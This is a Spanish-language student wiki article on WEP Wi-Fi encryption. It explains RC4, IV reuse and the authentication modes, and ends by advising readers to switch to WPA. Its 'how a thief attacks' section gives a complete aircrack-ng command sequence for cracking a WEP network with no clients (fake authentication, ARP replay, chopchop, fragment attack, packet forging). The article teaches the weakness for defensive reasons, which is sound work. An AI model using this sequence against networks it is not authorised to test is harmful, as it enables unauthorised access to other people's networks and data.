Trabajo:Seguridad WEP

De FdIwiki ELP
Saltar a: navegación, buscar

Cifrado WEP

WEP fue incluido como el método para asegurar la privacidad del estándar original IEEE 802.11 ratificado en septiembre de 1999. WEP usa el algoritmo de cifrado RC4 para la confidencialidad, mientras que el CRC-32 proporciona la integridad. El RC4 funciona expandiendo una semilla ("seed" en inglés) para generar una secuencia de números pseudoaleatorios de mayor tamaño. Esta secuencia de números se unifica con el mensaje mediante una operación XOR para obtener un mensaje cifrado. Uno de los problemas de este tipo de algoritmos de cifrado es que no se debe usar la misma semilla para cifrar dos mensajes diferentes, ya que obtener la clave sería trivial a partir de los dos textos cifrados resultantes. Para evitar esto, WEP especifica un vector de iniciación (IV) de 24 bits que se modifica regularmente y se concatena a la contraseña (a través de esta concatenación se genera la semilla que sirve de entrada al algoritmo).

El estándar WEP de 64 bits usa una llave de 40 bits (también conocido como WEP-40), que es enlazado con un vector de iniciación de 24 bits (IV) para formar la clave de tráfico RC4. Al tiempo que el estándar WEP original estaba siendo diseñado, llegaron de parte del gobierno de los Estados Unidos una serie de restricciones en torno a la tecnología criptográfica, limitando el tamaño de clave. Una vez que las restricciones fueron levantadas, todos los principales fabricantes poco a poco fueron implementando un protocolo WEP extendido de 128 bits usando un tamaño de clave de 104 bits (WEP-104).

Una clave WEP de 128 bits consiste casi siempre en una cadena de 26 caracteres hexadecimales (0-9, a-f) introducidos por el usuario. Cada carácter representa 4 bits de la clave (4 x 26 = 104 bits). Añadiendo el IV de 24 bits obtenemos lo que conocemos como “Clave WEP de 128 bits”. Un sistema WEP de 256 bits está disponible para algunos desarrolladores, y como en el sistema anterior, 24 bits de la clave pertenecen a IV, dejando 232 bits para la protección. Consiste generalmente en 58 caracteres hexadecimales. (58 x 4 = 232 bits) + 24 bits IV = 256 bits de protección WEP.

El tamaño de clave no es la única limitación de WEP. Crackear una clave larga requiere interceptar más paquetes, pero hay modos de ataque que incrementan el tráfico necesario. Hay otras debilidades en WEP, como por ejemplo la posibilidad de colisión de IV’s o los paquetes alterados, problemas que no se solucionan con claves más largas.

Autenticación

En el sistema WEP se pueden utilizar dos métodos de autenticación: Sistema Abierto y Clave Compartida.

Para más claridad hablaremos de la autenticación WEP en el modo de Infraestructura (por ejemplo, entre un cliente WLAN y un Punto de Acceso), pero se puede aplicar también al modo Ad-Hoc.

Autenticación de Sistema Abierto: el cliente WLAN no se tiene que identificar en el Punto de Acceso durante la autenticación. Así, cualquier cliente, independientemente de su clave WEP, puede verificarse en el Punto de Acceso y luego intentar conectarse. En efecto, la no autenticación (en el sentido estricto del término) ocurre. Después de la autenticación y la asociación, el sistema WEP puede ser usado para cifrar los paquetes de datos. En este punto, el cliente tiene que tener las claves correctas.

Autenticación mediante Clave Compartida: WEP es usado para la autenticación. Este método se puede dividir en cuatro fases:

· La estación cliente envía una petición de autenticación al Punto de Acceso. · El punto de acceso envía de vuelta un texto modelo. · El cliente tiene que cifrar el texto modelo usando la clave WEP ya configurada, y reenviarlo al Punto de Acceso en otra petición de autenticación. · El Punto de Acceso descifra el texto codificado y lo compara con el texto modelo que había enviado. Dependiendo del éxito de esta comparación, el Punto de Acceso envía una confirmación o una denegación. Después de la autenticación y la asociación, WEP puede ser usado para cifrar los paquetes de datos.

A primera vista podría parecer que la autenticación por Clave Compartida es más segura que la autenticación por Sistema Abierto, ya que éste no ofrece ninguna autenticación real. Sin embargo, es posible averiguar la clave WEP estática interceptando los cuatro paquetes de cada una de las fases de la autenticación con Clave Compartida. Por lo tanto es aconsejable usar la autenticación de Sistema Abierto para la autenticación WEP (nótese que ambos mecanismos de autenticación son débiles).

Problemas de seguridad

El problema principal del cifrado WEP es que sus vectores de inicialización se repiten mas veces de lo esperado en mensajes distintos. Si el ladrón de internet se pone a escuchar paquetes data sin parar, acabará consiguiendo suficientes vectores de inicialización(IV) como para crackear la contraseña con diferentes calculos matemáticos ya automatizados. Aún sin clientes que generen dicho tráfico, no estamos a salvo, pues es posible generar paquetes ARP inventados para generar tráfico.

Cómo ataca un ladrón

Aqui dejo un esquema de como lo haría un ladrón sin clientes en el wifi:

1.) Miramos la interfaz que tiene nuestra tarjeta de red para ponerla en modo monitor

  1. ifconfig

2.) Ponemos la tarjeta de red en modo monitor para poder capturar todos los paquetes wifi que circulan por el aire

  1. airmon-ng start wlan0

3.) Seleccionamos la red wifi que queremos auditar y capturamos solo los paquetes dirigidos a esa red

  1. airodump-ng wlan0mon -c <CANALAP> --bssid <BSSID> -w fichero_captura_paquetes

4.) Lanzamos un paquete especifico de la herramienta aireplay para crear una autenticación falsa en la red a auditar y así poder generar tráfico más tarde.

  1. aireplay-ng -1 10 -a <BSSID> wlan0mon

5.) PARA COGER UN PAQUETE ARP MANDADO, COPIARLO Y LANZARLO SIN PARAR

aireplay-ng -3 -b <BSSID> wlan0mon

LANZAMOS ATAQUE CHOPCHOP PARA CONSEGUIR EL .xor(PRGA) UTILIZADO PARA MONTAR UN PAQUETE ARP

  1. aireplay-ng -4 -h <MAC_HOST> wlan0mon

SI NO FUNCIONA UTILIZAMOS EL ATAQUE FRAGMENT

  1. aireplay-ng -5 -b <BSSID> -h <MAC_HOST> wlan0mon

CON EL .xor, LA BSSID, LA MAC DE TU INTERFAZ, LA IP DEL ROUTER, LA IP SOURCE, EL .xor GENERAMOS UN PAQUETE ARP

  1. packetforge-ng -0 -a <BSSID> -h <MAC_HOST> -k <IP_ROUTER> -l <IP_FALSA> -y replay_dec-0116-135548.xor -w paquetearp

LANZAMOS EL PAQUETE ARP PARA QUE LO COPIE EL -3

  1. aireplay-ng -2 -x 1024 -h 00:18:e7:39:6b:34 -r paquetearp wlan0mon

GRACIAS AL AIRODUMP YA TENDREMOS UN .cap CON 50000 DATA Y CRACKEAREMOS

  1. aircrack-ng fichero_captura_paquetes-01.cap

Cómo mantenerte seguro ante estos ataques

No puedes, no uses NUNCA este cifrado, es anticuado y débil, y pones en riesgo tus datos y que actúen en tu nombre. Recomiendo usar WPA, y recomiendo mirar el artículo relacionado con WPA para mantenerte seguro.

Enlaces externos

https://es.wikipedia.org/wiki/Wired_Equivalent_Privacy

https://www.redeszone.net/seguridad-informatica/hackear-una-red-wifi-sin-clientes-conectados/